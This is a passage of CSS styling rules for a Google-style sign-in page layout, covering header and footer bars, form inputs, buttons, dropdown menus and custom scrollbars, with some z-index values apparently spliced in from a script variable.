line-height: 24px; margin: 0 0 .46em; } p { line-height: 17px; margin: 0 0 1em; } ol, ul { list-style: none; line-height: 17px; margin: 0 0 1em; } li { margin: 0 0 .5em; } table { border-collapse: collapse; border-spacing: 0; } strong { color: #222; } </style> <style type='text/css'> html, body { position: absolute; height: 100%; min-width: 100%; } .wrapper { position: relative; min-height: 100%; } .wrapper + style + iframe { display: none; } .content { padding: 0 44px; } .google-header-bar { height: 71px; background: #f1f1f1; border-bottom: 1px solid #e5e5e5; overflow: hidden; } .header .logo { margin: 17px 0 0; float: left; } .header .signin, .header .signup { margin: 28px 0 0; float: right; font-weight: bold; } .header .signin-button, .header .signup-button { margin: 22px 0 0; float: right; } .header .signin-button a { font-size: 13px; font-weight: normal; } .header .signup-button a { position: relative; top: -1px; margin: 0 0 0 1em; } .main { margin: 0 auto; width: 650px; padding-top: 23px; padding-bottom: 100px; } .main h1:first-child { margin: 0 0 .92em; } .google-footer-bar { position: absolute; bottom: 0; height: 35px; width: 100%; border-top: 1px solid #ebebeb; overflow: hidden; } .footer { padding-top: 9px; font-size: .85em; white-space: nowrap; line-height: 0; } .footer ul { color: #999; float: left; max-width: 80%; } .footer ul li { display: inline; padding: 0 1.5em 0 0; } .footer a { color: #333; } .footer form { text-align: right; } .footer form .lang-chooser { max-width: 20%; } .redtext { color: #dd4b39; } .greytext { color: #555; } .secondary { font-size: 11px; color: #666; } .source { color: #093; } .hidden { display: none; } .announce-bar { position: absolute; bottom: 35px; height: 33px; z-index:"+zztop+" ; width: 100%; background: #f9edbe; border-top: 1px solid #efe1ac; border-bottom: 1px solid #efe1ac; overflow: hidden; } .announce-bar .message { font-size: .85em; line-height: 33px; margin: 0; } .announce-bar .message .separated { margin-left: 1.5em; } .announce-bar-ac { background: #eee; border-top: 1px solid #e5e5e5; border-bottom: 1px solid #e5e5e5; } .clearfix:after { visibility: hidden; display: block; font-size: 0; content: '.'; clear: both; height: 0; } * html .clearfix { zoom: 1; } *:first-child+html .clearfix { zoom: 1; } </style> <style type='text/css'> button, input, select, textarea { font-family: inherit; font-size: inherit; } button::-moz-focus-inner, input::-moz-focus-inner { border: 0; } input[type=email], input[type=number], input[type=password], input[type=tel], input[type=text], input[type=url] { display: inline-block; height: 29px; margin: 0; padding: 0 8px; background: #fff; border: 1px solid #d9d9d9; border-top: 1px solid #c0c0c0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; } input[type=email]:hover, input[type=number]:hover, input[type=password]:hover, input[type=tel]:hover, input[type=text]:hover, input[type=url]:hover { border: 1px solid #b9b9b9; border-top: 1px solid #a0a0a0; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); } input[type=email]:focus, input[type=number]:focus, input[type=password]:focus, input[type=tel]:focus, input[type=text]:focus, input[type=url]:focus { outline: none; border: 1px solid #4d90fe; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); } input[type=email][disabled=disabled], input[type=number][disabled=disabled], input[type=password][disabled=disabled], input[type=tel][disabled=disabled], input[type=text][disabled=disabled], input[type=url][disabled=disabled] { border: 1px solid #e5e5e5; background: #f1f1f1; } input[type=email][disabled=disabled]:hover, input[type=number][disabled=disabled]:hover, input[type=password][disabled=disabled]:hover, input[type=tel][disabled=disabled]:hover, input[type=text][disabled=disabled]:hover, input[type=url][disabled=disabled]:hover { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } input[type=email][readonly=readonly], input[type=number][readonly=readonly], input[type=password][readonly=readonly], input[type=text][readonly=readonly], input[type=url][readonly=readonly] { border: 1px solid #d9d9d9; } input[type=email][readonly=readonly]:hover, input[type=number][readonly=readonly]:hover, input[type=password][readonly=readonly]:hover, input[type=text][readonly=readonly]:hover, input[type=url][readonly=readonly]:hover, input[type=email][readonly=readonly]:focus, input[type=number][readonly=readonly]:focus, input[type=password][readonly=readonly]:focus, input[type=text][readonly=readonly]:focus, input[type=url][readonly=readonly]:focus { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } input[type=checkbox].form-error, input[type=email].form-error, input[type=number].form-error, input[type=password].form-error, input[type=text].form-error, input[type=url].form-error { border: 1px solid #dd4b39; } input[type=checkbox], input[type=radio] { -webkit-appearance: none; appearance: none; width: 13px; height: 13px; margin: 0; cursor: pointer; vertical-align: bottom; background: #fff; border: 1px solid #dcdcdc; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; position: relative; } input[type=checkbox]:active, input[type=radio]:active { border-color: #c6c6c6; background: #ebebeb; } input[type=checkbox]:hover { border-color: #c6c6c6; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1); box-shadow: inset 0 1px 1px rgba(0,0,0,0.1); } input[type=radio] { -webkit-border-radius: 1em; -moz-border-radius: 1em; border-radius: 1em; width: 15px; height: 15px; } input[type=checkbox]:checked, input[type=radio]:checked { background: #fff; } input[type=radio]:checked::after { content: ''; display: block; position: relative; top: 3px; left: 3px; width: 7px; height: 7px; background: #666; -webkit-border-radius: 1em; -moz-border-radius: 1em; border-radius: 1em; } input[type=checkbox]:checked::after { content: url(https://ssl.gstatic.com/ui/v1/menu/checkmark.png); display: block; position: absolute; top: -6px; left: -5px; } input[type=checkbox]:focus { outline: none; border-color:#4d90fe; } .g-button { display: inline-block; min-width: 46px; text-align: center; color: #444; font-size: 11px; font-weight: bold; height: 27px; padding: 0 8px; line-height: 27px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; -webkit-transition: all 0.218s; -moz-transition: all 0.218s; -ms-transition: all 0.218s; -o-transition: all 0.218s; transition: all 0.218s; border: 1px solid #dcdcdc; background-color: #f5f5f5; background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1)); background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: linear-gradient(top,#f5f5f5,#f1f1f1); -webkit-user-select: none; -moz-user-select: none; user-select: none; cursor: default; } *+html .g-button { min-width: 70px; } button.g-button, input[type=submit].g-button { height: 29px; line-height: 29px; vertical-align: bottom; margin: 0; } *+html button.g-button, *+html input[type=submit].g-button { overflow: visible; } .g-button:hover { border: 1px solid #c6c6c6; color: #333; text-decoration: none; -webkit-transition: all 0.0s; -moz-transition: all 0.0s; -ms-transition: all 0.0s; -o-transition: all 0.0s; transition: all 0.0s; background-color: #f8f8f8; background-image: -webkit-gradient(linear,left top,left bottom,from(#f8f8f8),to(#f1f1f1)); background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: linear-gradient(top,#f8f8f8,#f1f1f1); -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1); -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1); box-shadow: 0 1px 1px rgba(0,0,0,0.1); } .g-button:active { background-color: #f6f6f6; background-image: -webkit-gradient(linear,left top,left bottom,from(#f6f6f6),to(#f1f1f1)); background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1); background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1); background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1); background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1); background-image: linear-gradient(top,#f6f6f6,#f1f1f1); -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); } .g-button:visited { color: #666; } .g-button-submit { border: 1px solid #3079ed; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.1); background-color: #4d90fe; background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed)); background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed); background-image: -moz-linear-gradient(top,#4d90fe,#4787ed); background-image: -ms-linear-gradient(top,#4d90fe,#4787ed); background-image: -o-linear-gradient(top,#4d90fe,#4787ed); background-image: linear-gradient(top,#4d90fe,#4787ed); } .g-button-submit:hover { border: 1px solid #2f5bb7; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.3); background-color: #357ae8; background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#357ae8)); background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8); background-image: -moz-linear-gradient(top,#4d90fe,#357ae8); background-image: -ms-linear-gradient(top,#4d90fe,#357ae8); background-image: -o-linear-gradient(top,#4d90fe,#357ae8); background-image: linear-gradient(top,#4d90fe,#357ae8); } .g-button-submit:active { -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); } .g-button-share { border: 1px solid #29691d; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.1); background-color: #3d9400; background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#398a00)); background-image: -webkit-linear-gradient(top,#3d9400,#398a00); background-image: -moz-linear-gradient(top,#3d9400,#398a00); background-image: -ms-linear-gradient(top,#3d9400,#398a00); background-image: -o-linear-gradient(top,#3d9400,#398a00); background-image: linear-gradient(top,#3d9400,#398a00); } .g-button-share:hover { border: 1px solid #2d6200; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.3); background-color: #368200; background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#368200)); background-image: -webkit-linear-gradient(top,#3d9400,#368200); background-image: -moz-linear-gradient(top,#3d9400,#368200); background-image: -ms-linear-gradient(top,#3d9400,#368200); background-image: -o-linear-gradient(top,#3d9400,#368200); background-image: linear-gradient(top,#3d9400,#368200); } .g-button-share:active { -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); } .g-button-red { border: 1px solid transparent; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.1); text-transform: uppercase; background-color: #d14836; background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#d14836)); background-image: -webkit-linear-gradient(top,#dd4b39,#d14836); background-image: -moz-linear-gradient(top,#dd4b39,#d14836); background-image: -ms-linear-gradient(top,#dd4b39,#d14836); background-image: -o-linear-gradient(top,#dd4b39,#d14836); background-image: linear-gradient(top,#dd4b39,#d14836); } .g-button-red:hover { border: 1px solid #b0281a; color: #fff; text-shadow: 0 1px rgba(0,0,0,0.3); background-color: #c53727; background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#c53727)); background-image: -webkit-linear-gradient(top,#dd4b39,#c53727); background-image: -moz-linear-gradient(top,#dd4b39,#c53727); background-image: -ms-linear-gradient(top,#dd4b39,#c53727); background-image: -o-linear-gradient(top,#dd4b39,#c53727); background-image: linear-gradient(top,#dd4b39,#c53727); -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.2); -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.2); -ms-box-shadow: 0 1px 1px rgba(0,0,0,0.2); -o-box-shadow: 0 1px 1px rgba(0,0,0,0.2); box-shadow: 0 1px 1px rgba(0,0,0,0.2); } .g-button-red:active { border: 1px solid #992a1b; background-color: #b0281a; background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#b0281a)); background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a); background-image: -moz-linear-gradient(top,#dd4b39,#b0281a); background-image: -ms-linear-gradient(top,#dd4b39,#b0281a); background-image: -o-linear-gradient(top,#dd4b39,#b0281a); background-image: linear-gradient(top,#dd4b39,#b0281a); -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); box-shadow: inset 0 1px 2px rgba(0,0,0,0.3); } .g-button-white { border: 1px solid #dcdcdc; color: #666; background: #fff; } .g-button-white:hover { border: 1px solid #c6c6c6; color: #333; background: #fff; -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1); -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1); box-shadow: 0 1px 1px rgba(0,0,0,0.1); } .g-button-white:active { background: #fff; -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); } .g-button-red:visited, .g-button-share:visited, .g-button-submit:visited { color: #fff; } .g-button-submit:focus, .g-button-share:focus, .g-button-red:focus { -webkit-box-shadow: inset 0 0 0 1px #fff; -moz-box-shadow: inset 0 0 0 1px #fff; box-shadow: inset 0 0 0 1px #fff; } .g-button-share:focus { border-color: #29691d; } .g-button-red:focus { border-color: #d14836; } .g-button-submit:focus:hover, .g-button-share:focus:hover, .g-button-red:focus:hover { -webkit-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1); box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1); } .g-button.selected { background-color: #eee; background-image: -webkit-gradient(linear,left top,left bottom,from(#eee),to(#e0e0e0)); background-image: -webkit-linear-gradient(top,#eee,#e0e0e0); background-image: -moz-linear-gradient(top,#eee,#e0e0e0); background-image: -ms-linear-gradient(top,#eee,#e0e0e0); background-image: -o-linear-gradient(top,#eee,#e0e0e0); background-image: linear-gradient(top,#eee,#e0e0e0); -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); border: 1px solid #ccc; color: #333; } .g-button img { display: inline-block; margin: -3px 0 0; opacity: .55; filter: alpha(opacity=55); vertical-align: middle; pointer-events: none; } *+html .g-button img { margin: 4px 0 0; } .g-button:hover img { opacity: .72; filter: alpha(opacity=72); } .g-button:active img { opacity: 1; filter: alpha(opacity=100); } .g-button.disabled img { opacity: .5; filter: alpha(opacity=50); } .g-button.disabled, .g-button.disabled:hover, .g-button.disabled:active, .g-button-submit.disabled, .g-button-submit.disabled:hover, .g-button-submit.disabled:active, .g-button-share.disabled, .g-button-share.disabled:hover, .g-button-share.disabled:active, .g-button-red.disabled, .g-button-red.disabled:hover, .g-button-red.disabled:active, input[type=submit][disabled=disabled].g-button { background-color: none; opacity: .5; filter: alpha(opacity=50); cursor: default; pointer-events: none; } .goog-menu { -webkit-box-shadow: 0 2px 4px rgba(0,0,0,0.2); -moz-box-shadow: 0 2px 4px rgba(0,0,0,0.2); box-shadow: 0 2px 4px rgba(0,0,0,0.2); -webkit-transition: opacity 0.218s; -moz-transition: opacity 0.218s; -ms-transition: opacity 0.218s; -o-transition: opacity 0.218s; transition: opacity 0.218s; background: #fff; border: 1px solid #ccc; border: 1px solid rgba(0,0,0,.2); cursor: default; font-size: 13px; margin: 0; outline: none; padding: 0 0 6px; position: absolute; z-index: "+zztop+"; overflow: auto; } .goog-menuitem, .goog-tristatemenuitem, .goog-filterobsmenuitem { position: relative; color: #333; cursor: pointer; list-style: none; margin: 0; padding: 6px 7em 6px 30px; white-space: nowrap; } .goog-menuitem-highlight, .goog-menuitem-hover { background-color: #eee; border-color: #eee; border-style: dotted; border-width: 1px 0; padding-top: 5px; padding-bottom: 5px; } .goog-menuitem-highlight .goog-menuitem-content, .goog-menuitem-hover .goog-menuitem-content { color: #333; } .goog-menuseparator { border-top: 1px solid #ebebeb; margin-top: 9px; margin-bottom: 10px; } .goog-inline-block { position: relative; display: -moz-inline-box; display: inline-block; } * html .goog-inline-block { display: inline; } *:first-child+html .goog-inline-block { display: inline; } .dropdown-block { display: block; } .goog-flat-menu-button { -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; background-color: #f5f5f5; background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1)); background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1); background-image: linear-gradient(top,#f5f5f5,#f1f1f1); border: 1px solid #dcdcdc; color: #444; font-size: 11px; font-weight: bold; line-height: 27px; list-style: none; margin: 0 2px; min-width: 46px; outline: none; padding: 0 18px 0 6px; text-decoration: none; vertical-align: middle; } .goog-flat-menu-button-disabled { background-color: #fff; border-color: #f3f3f3; color: #b8b8b8; cursor: default; } .goog-flat-menu-button.goog-flat-menu-button-hover { background-color: #f8f8f8; background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1); background-image: linear-gradient(top,#f8f8f8,#f1f1f1); -webkit-box-shadow: 0 1px 1px rgba(0,0,0,.1); -moz-box-shadow: 0 1px 1px rgba(0,0,0,.1); box-shadow: 0 1px 1px rgba(0,0,0,.1); border-color: #c6c6c6; color: #333; } .goog-flat-menu-button.goog-flat-menu-button-focused { border-color: #4d90fe; } .form-error .goog-flat-menu-button { border: 1px solid #dd4b39; } .form-error .goog-flat-menu-button-focused { border-color: #4d90fe; } .goog-flat-menu-button.goog-flat-menu-button-open, .goog-flat-menu-button.goog-flat-menu-button-active { -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1); -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1); box-shadow: inset 0 1px 2px rgba(0,0,0,.1); background-color: #eee; background-image: -webkit-linear-gradient(top,#eee,#e0e0e0); background-image: -moz-linear-gradient(top,#eee,#e0e0e0); background-image: -ms-linear-gradient(top,#eee,#e0e0e0); background-image: -o-linear-gradient(top,#eee,#e0e0e0); background-image: linear-gradient(top,#eee,#e0e0e0); border: 1px solid #ccc; color: #333; z-index: "+zztop+"; } .goog-flat-menu-button-caption { vertical-align: top; white-space: nowrap; } .goog-flat-menu-button-dropdown { border-color: #777 transparent; border-style: solid; border-width: 4px 4px 0; height: 0; width: 0; position: absolute; right: 5px; top: 12px; } .jfk-select .goog-flat-menu-button-dropdown { background: url(https://ssl.gstatic.com/ui/v1/disclosure/grey-disclosure-arrow-up-down.png) center no-repeat; border: none; height: 11px; margin-top: -4px; width: 7px; } .goog-menu-nocheckbox .goog-menuitem, .goog-menu-noicon .goog-menuitem { padding-left: 16px; vertical-align: middle; } body ::-webkit-scrollbar { height: 16px; width: 16px; overflow: visible; } body ::-webkit-scrollbar-button { height: 0; width: 0; } body ::-webkit-scrollbar-track { background-clip: padding-box; border: solid transparent; border-width: 0 0 0 7px; } body ::-webkit-scrollbar-track:horizontal { border-width: 7px 0 0; } body ::-webkit-scrollbar-track:hover { background-color: rgba(0,0,0,.05); -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1); box-shadow: inset 1px 0 0 rgba(0,0,0,.1); } body ::-webkit-scrollbar-track:horizontal:hover { -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1); box-shadow: inset 0 1px 0 rgba(0,0,0,.1); } body ::-webkit-scrollbar-track:active { background-color: rgba(0,0,0,.05); -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); } body ::-webkit-scrollbar-track:horizontal:active { -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); } .jfk-scrollbar-dark::-webkit-scrollbar-track:hover { background-color: rgba(255,255,255,.1); -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2); box-shadow: inset 1px 0 0 rgba(255,255,255,.2); } .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:hover { -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2); box-shadow: inset 0 1px 0 rgba(255,255,255,.2); } .jfk-scrollbar-dark::-webkit-scrollbar-track:active { background-color: rgba(255,255,255,.1); -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15); box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15); } .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:active { -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15); box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15); } body ::-webkit-scrollbar-thumb { background-color: rgba(0,0,0,.2); background-clip: padding-box; border: solid transparent; border-width: 0 0 0 7px; min-height: 28px; padding: 100px 0 0; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07); } body ::-webkit-scrollbar-thumb:horizontal { border-width: 7px 0 0; padding: 0 0 0 100px; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07); } body ::-webkit-scrollbar-thumb:hover { background-color: rgba(0,0,0,.4); -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25); box-shadow: inset 1px 1px 1px rgba(0,0,0,.25); } body ::-webkit-scrollbar-thumb:active { background-color: rgba(0,0,0,.5); -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,.35); box-shadow: inset 1px 1px 3px rgba(0,0,0,.35); } .jfk-scrollbar-dark::-webkit-scrollbar-thumb { background-color: rgba(255,255,255,.3); -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1); box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1); } .jfk-scrollbar-dark::-webkit-scrollbar-thumb:horizontal { -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1); box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1); } .jfk-scrollbar-dark::-webkit-scrollbar-thumb:hover { background-color: rgba(255,255,255,.6); -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37); box-shadow: inset 1px 1px 1px rgba(255,255,255,.37); } .jfk-scrollbar-dark::-webkit-scrollbar-thumb:active { background-color: rgba(255,255,255,.75); -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5); box-shadow: inset 1px 1px 3px rgba(255,255,255,.5); } .jfk-scrollbar-borderless::-webkit-scrollbar-track { border-width: 0 1px 0 6px } .jfk-scrollbar-borderless::-webkit-scrollbar-track:horizontal { border-width: 6px 0 1px } .jfk-scrollbar-borderless::-webkit-scrollbar-track:hover { background-color: rgba(0,0,0,.035); -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07); } .jfk-scrollbar-borderless.jfk-scrollbar-dark::-webkit-scrollbar-track:hover { background-color: rgba(255,255,255,.07); -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15); box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15); } .jfk-scrollbar-borderless::-webkit-scrollbar-thumb { border-width: 0 1px 0 6px; } .jfk-scrollbar-borderless::-webkit-scrollbar-thumb:horizontal { border-width: 6px 0 1px; } body ::-webkit-scrollbar-corner { background: transparent; } body::-webkit-scrollbar-track-piece { background-clip: padding-box; background-color: #f1f1f1; border: solid #fff; border-width: 0 0 0 3px; -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); } body::-webkit-scrollbar-track-piece:horizontal { border-width: 3px 0 0; -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); } body::-webkit-scrollbar-thumb { border-width: 1px 1px 1px 5px; } body::-webkit-scrollbar-thumb:horizontal { border-width: 5px 1px 1px; } body::-webkit-scrollbar-corner { background-clip: padding-box; background-color: #f1f1f1; border: solid #fff; border-width: 3px 0 0 3px; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14); box-shadow: inset 1px 1px 0 rgba(0,0,0,.14); } .jfk-scrollbar::-webkit-scrollbar { height: 16px; overflow: visible; width: 16px; } .jfk-scrollbar::-webkit-scrollbar-button { height: 0; width: 0; } .jfk-scrollbar::-webkit-scrollbar-track { background-clip: padding-box; border: solid transparent; border-width: 0 0 0 7px; } .jfk-scrollbar::-webkit-scrollbar-track:horizontal { border-width: 7px 0 0; } .jfk-scrollbar::-webkit-scrollbar-track:hover { background-color: rgba(0,0,0,.05); -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1); box-shadow: inset 1px 0 0 rgba(0,0,0,.1); } .jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover { -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1); box-shadow: inset 0 1px 0 rgba(0,0,0,.1); } .jfk-scrollbar::-webkit-scrollbar-track:active { background-color: rgba(0,0,0,.05); -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07); } .jfk-scrollbar::-webkit-scrollbar-track:horizontal:active { -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover { background-color: rgba(255,255,255,.1); -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2); box-shadow: inset 1px 0 0 rgba(255,255,255,.2); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover { -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2); box-shadow: inset 0 1px 0 rgba(255,255,255,.2); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:active { background-color: rgba(255,255,255,.1); -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15); box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:active { -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15); box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15); } .jfk-scrollbar::-webkit-scrollbar-thumb { background-color: rgba(0,0,0,.2); background-clip: padding-box; border: solid transparent; border-width: 0 0 0 7px; min-height: 28px; padding: 100px 0 0; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07); } .jfk-scrollbar::-webkit-scrollbar-thumb:horizontal { border-width: 7px 0 0; padding: 0 0 0 100px; -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07); box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07); } .jfk-scrollbar::-webkit-scrollbar-thumb:hover { background-color: rgba(0,0,0,.4); -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25); box-shadow: inset 1px 1px 1px rgba(0,0,0,.25); } .jfk-scrollbar::-webkit-scrollbar-thumb:active { background-color: rgba(0,0,0,0.5); -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35); box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35); } .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb { background-color: rgba(255,255,255,.3); -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1); box-shadow: inset 1px 1px 0 